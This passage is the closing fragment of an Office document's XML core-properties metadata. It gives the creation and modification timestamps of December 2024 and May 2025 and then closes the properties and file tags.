  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-19T12:05:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-17T09:16:57Z</dcterms:modified>
</cp:coreProperties>
</file>